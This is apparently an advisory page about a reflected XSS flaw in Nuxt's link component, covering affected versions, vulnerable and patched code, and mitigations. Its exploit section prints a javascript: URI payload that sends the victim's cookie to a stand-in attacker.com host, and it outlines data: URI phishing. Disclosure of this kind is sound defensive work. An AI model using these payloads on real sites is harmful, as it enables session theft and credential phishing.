Nuxt, Reflected XSS, CVE-2026-53722 (Medium) -DC-Jun2026-462

Listen to this Post

Nuxt is a popular open-source Vue.js framework used to build full-stack web applications. Prior to versions 3.21.7 and 4.4.7, the `` component contained a reflected DOM‑based cross‑site scripting (XSS) vulnerability due to improper validation of URL schemes.
The `` component accepts a `to` or `href` prop to define navigation targets. When an application binds user‑controlled input—such as a query parameter, a CMS field, or a user‑supplied profile URL—directly to `` or :href, an attacker can supply a `javascript:` or `vbscript:` URI. The component renders this value verbatim into the `href` attribute of the underlying `` element without any sanitisation. When a victim clicks the link, the browser executes the script in the context of the application’s origin, leading to reflected DOM‑based XSS.
A `data:text/html,…` payload does not execute in the application’s origin but enables a same‑tab phishing attack, displaying a fake login overlay or credential‑harvesting form while the victim remains on a legitimate application URL.
The vulnerability also affects the component’s custom slot, which exposes `href` and `route.href` props to consumers. Any application that re‑binds these values to its own anchor tags is equally vulnerable.
Unlike the previously reported `navigateTo` issue (CVE‑2024‑34343), the sink here is the rendered anchor itself. The existing `isScriptProtocol` checks in `navigateTo` and `reloadNuxtApp` are not on this code path. The `onClick` handler intentionally returns early for external links, leaving the browser’s native protocol‑based navigation to run.

Affected component:

DailyCVE Form

Platform: Nuxt
Version: <3.21.7, 4.0.0–<4.4.7
Vulnerability: Reflected DOM‑based XSS
Severity: Medium (CVSS 5.1)
date: 2026‑06‑12
Prediction: Already patched – upgrade to 3.21.7 or 4.4.7

What Undercode Say

Analytics:

  • Affected versions: Nuxt 3.x before 3.21.7 and 4.x before 4.4.7.
  • Over 3,000 dependent packages.
  • Attack vector: Network (AV:N) with low attack complexity (AC:L) and no privileges required (PR:N); requires user interaction (UI:A).
  • Confidentiality and integrity impact: Low (VC:L / VI:L).

Bash commands to check your Nuxt version:

Check installed Nuxt version
npm list nuxt
Check version in package.json
cat package.json | grep '"nuxt"'
Check for vulnerable range (3.x < 3.21.7 or 4.x < 4.4.7)
node -e "const pkg = require('./package.json'); const v = pkg.dependencies?.nuxt || pkg.devDependencies?.nuxt; if (v) console.log('Nuxt version:', v);"

Code snippet – Vulnerable pattern:

<template>
<!-- Attacker-controlled input bound directly to :to -->
<NuxtLink :to="user.website">Visit profile</NuxtLink>
</template>

<script setup>
// user.website = "javascript:alert('XSS')" from query param or CMS
const user = ref({ website: route.query.url });
</script>

Code snippet – Patched behaviour ([email protected] / 3.21.7):

// Simplified sanitisation logic applied before rendering
function sanitiseHref(href: string): string {
// Strip control chars and whitespace
href = href.replace(/[\x00-\x1f\x20]+/g, '');
// Unwrap leading view-source:
if (href.startsWith('view-source:')) href = href.slice(12);
// Reject script-capable schemes
if (isScriptProtocol(href)) return '';
return href;
}

Exploit

An attacker can inject a malicious URL via any user‑controllable input that is later bound to `` or :href. Common injection points include:
– Query parameters: https://victim.com/profile?url=javascript:alert(document.cookie)`
- CMS fields: A CMS‑driven landing page that renders ``
- User‑supplied profile links: Marketplace or social platforms that display seller‑supplied URLs
- "Share this" / "Open in new tab" handlers that pass through a query parameter
<h2 style="color: blue;">Example attack:</h2>
1. Attacker crafts a link: `https://victim.com/dashboard?redirect=javascript:fetch('https://attacker.com/steal?cookie='%2bdocument.cookie)`
<h2 style="color: blue;">2. Victim clicks the rendered
.</h2>
3. The `javascript:` URI executes in the victim’s browser, sending their session cookie to the attacker’s server.
For
data:text/html,…, the attacker can display a fake login form within the legitimate application’s tab, harvesting credentials.
<h2 style="color: blue;">Protection</h2>
<h2 style="color: blue;">Immediate actions:</h2>
- Upgrade to Nuxt 3.21.7 or 4.4.7 immediately.
- If you cannot upgrade immediately, validate all URLs before binding them to
:
- Only accept paths that start with `/` (and not
//).
- Run user‑supplied URLs through `new URL(value)` and reject anything whose `protocol` is not in an allow‑list (typically `http:` and
https:`).
– Avoid binding raw user input to `to` or `href` props without sanitisation.
– Use Content Security Policy (CSP) to restrict script execution from `javascript:` URIs (though this is a defence‑in‑depth measure, not a complete fix).

Patch details:

  • The fix strips control characters and whitespace, unwraps `view-source:` prefixes, and replaces any remaining script‑capable scheme with an empty string.
  • The sanitisation is applied to the resolved external `href` before it is passed to `` or the custom slot.

Impact

  • Session theft: Attackers can steal non‑HttpOnly cookies, gaining access to user sessions.
  • CSRF token theft: CSRF tokens can be exfiltrated, enabling cross‑site request forgery.
  • Account takeover: DOM rewriting allows the attacker to modify the page content and redirect users to attacker‑controlled endpoints.
  • Credential harvesting: Fake login overlays can be injected to capture usernames and passwords.
  • Phishing: `data:text/html,…` payloads enable same‑tab phishing attacks anchored to a legitimate application URL, increasing the credibility of the attack.
    Any Nuxt application that binds user‑controlled values to `` or `:href` is vulnerable, including profile‑link rendering, “share this” handlers, CMS‑driven landing pages, and marketplace listings.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top